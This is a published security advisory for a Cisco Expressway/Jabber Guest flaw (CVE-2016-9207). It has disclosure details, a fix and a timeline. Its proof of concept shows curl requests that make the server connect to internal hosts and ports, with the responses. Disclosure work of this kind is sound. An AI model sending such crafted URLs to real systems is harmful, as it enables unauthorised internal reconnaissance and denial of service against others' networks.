Cisco Expressway 8.8.1 Internal Scanning

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Advisory ID: SYSS-2016-115  
Product: Expressway  
Manufacturer: Cisco  
Affected Version(s): below X8.9  
Tested Version(s): X8.8.1  
Vulnerability Type: Improper Input Validation (CWE-20)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2016-11-10  
Solution Date: 2016-12-05  
Public Disclosure: 2016-12-14  
CVE Reference: CVE-2016-9207  
Author of Advisory: Micha Borrmann, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
Jabber Guest [1] can be used to connect people from the Internet with  
enterprise workers using video calls within a web browser.  
  
Due to improper input validation, it is possible by using specially  
crafted URLs to perform port scans from the used video communication  
server (VCS) [2] of any system which can be reached by it, usually  
internal servers. It is also possible to perform denial-of-service  
attacks against the VCS by downloading large files.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
A part of the URL is a host name (usually the internal Jabber Guest  
server) which will be connected from the EXP-C [3] which acts like a  
web proxy, if /jabberc/rest/calls/ is appended to the first "directory".  
With a colon (:), it is also possible to specify a target TCP port.  
Therefore, anybody, for example an external attacker, can abuse the web-based   
application to connect to target systems. If the system is a web  
server, it also possible to download files from it.   
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
This HTTP GET requests connects to the SSH server on localhost:  
  
$ curl --include https://jabberguest.company.com/127.0.0.1:22/jabberc/rest/calls/index.txt  
HTTP/1.1 200 Connection Established  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:14:20 GMT  
Transfer-Encoding: chunked  
Connection: keep-alive  
Age: 0  
  
SSH-2.0-OpenSSH_6.6 PKIX  
Protocol mismatch.  
  
It can be confirmed, that no SMTP service is running on localhost (very simple port scan):  
  
$ curl --include https://jabberguest.company.com/127.0.0.1:25/jabberc/rest/calls/index.txt  
HTTP/1.1 502 Connection refused  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:22:30 GMT  
Content-Type: text/html; charset=utf-8  
Content-Length: 253  
Connection: keep-alive  
Cache-Control: no-store  
Content-Language: en  
Age: 0  
  
<HTML>  
<HEAD>  
<TITLE>Could Not Connect</TITLE>  
</HEAD>  
  
<BODY BGCOLOR="white" FGCOLOR="black">  
<H1>Could Not Connect</H1>  
<HR>  
  
<FONT FACE="Helvetica,Arial"><B>  
Description: Could not connect to the server "<EM>127.0.0.1</EM>".  
</B></FONT>  
<HR>  
</BODY>  
  
Connections to other servers are possible, too:  
  
$ curl --include https://jabberguest.company.com/172.27.14.74:22/jabberc/rest/calls/index.txt  
HTTP/1.1 200 Connection Established  
Server: nginx/1.6.2  
Date: Fri, 11 Nov 2016 12:13:00 GMT  
Transfer-Encoding: chunked  
Connection: keep-alive  
Age: 0  
  
SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515  
Protocol mismatch.  
  
If a web server contains files within the directory structure  
/jabberc/rest/calls/, they can be downloaded via the Jabber Guest via  
EXP-E via EXP-C. For demonstration purposes, there was a simple text  
file placed at such directory (on a Microsoft Server system which can  
also be identified):  
  
$ curl --include https://jabberguest.company.com/172.27.14.12/jabberc/rest/calls/index.txt   
HTTP/1.1 200 OK  
Content-Type: text/plain  
Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT  
Accept-Ranges: bytes  
ETag: "78c1c7984c30d21:0"  
Server: Microsoft-IIS/7.5  
X-Powered-By: ASP.NET  
Date: Thu, 10 Nov 2016 09:28:15 GMT  
Content-Length: 7  
Age: 0  
Connection: keep-alive  
  
hallo  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Update to software version 8.9  
  
More Information:  
https://software.cisco.com/download/release.html?mdfid=286255326&flowid=77866&softwareid=280886992&release=X8.9&relind=AVAILABLE&rellifecycle=&reltype=latest  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2016-10-27: Vulnerability discovered  
2016-11-10: Vulnerability reported to manufacturer  
2016-12-05: Patch released by manufacturer  
2016-12-07: Public disclosure of vulnerability by manufacturer [4]  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for Jabber Guest  
http://www.cisco.com/c/en/us/products/unified-communications/jabber-guest/index.html  
[2] Product website for Video Communication Server (VCS)  
http://www.cisco.com/c/en/us/products/unified-communications/telepresence-video-communication-server-vcs/index.html  
[3] Product website for Expressway  
http://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html  
[4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability  
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161207-expressway  
[5] SySS Security Advisory SYSS-2016-115  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-115.txt  
[6] SySS Responsible Disclosure Policy  
https://www.syss.de/en/news/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Micha Borrmann of SySS GmbH.  
  
E-Mail: [email protected]  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc  
Key ID: 0xEDBE26E714EA58760  
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlhRQsIACgkQ7b4m5xTq  
WHbgng//Xk5ZUqAtc7U47JlqoOzAd/luGgRQF3UXPVCjyFncRi13HuQjd7vZccyw  
8SlwCpACHeLSnB6vcCqkG2FVIbmnQWyWjF1ZFQsvLNbAZGHc+IfG9wGm1W10oL1r  
+GLvjA/edwG+L0ifga0Mpw051N1/22/mAz77ISyuJ89x5pjzGD583WKdlCF7E/Z9  
yZpMILpTfLH1+pIsCHYNtnUhToQbUAquPrXxp4iQxM5mK16/0Aa+lNLHYKCA0zz0  
idnBKbepYTpB562hoJERegMfVfMmrIZteyrOVPHILJOwOoCkLIZCSx9gBG7cnImz  
Pwe9XAzvA/oJZIrbOozi+0L4ANdhAWVcXpj6YCvRObJ56iXT4sK733iuIaGyB5Ur  
vTUGCI5+ASi8hKmJdX0n2mGj57UjOskahH3BACIgxM6X4AfPfAxCFstBBRdx0w8Z  
jd3/RqvH0hfVuwPowClaGjwvuEFGGTMFo8sd0JaYLiqnTustvHNMJlfmjXJ2paXy  
bDHQ1aIdxyAqsCNjTL+jyE+jhM5kHLGLFUmtR8DWpBoNfM73BwxAHmLb0ypTWLQv  
yqS9n1E24VJjkcv6r0i6qY0grU6RddUKXoC5gDlcvY/kQhnNHHqBHJC8veIRcMj4  
U3E6NkU+Q6iCATkBqWxSPKkvmtdbYmo0M85djq3yxEUUthVFQWw=  
=LH5U  
-----END PGP SIGNATURE-----  
`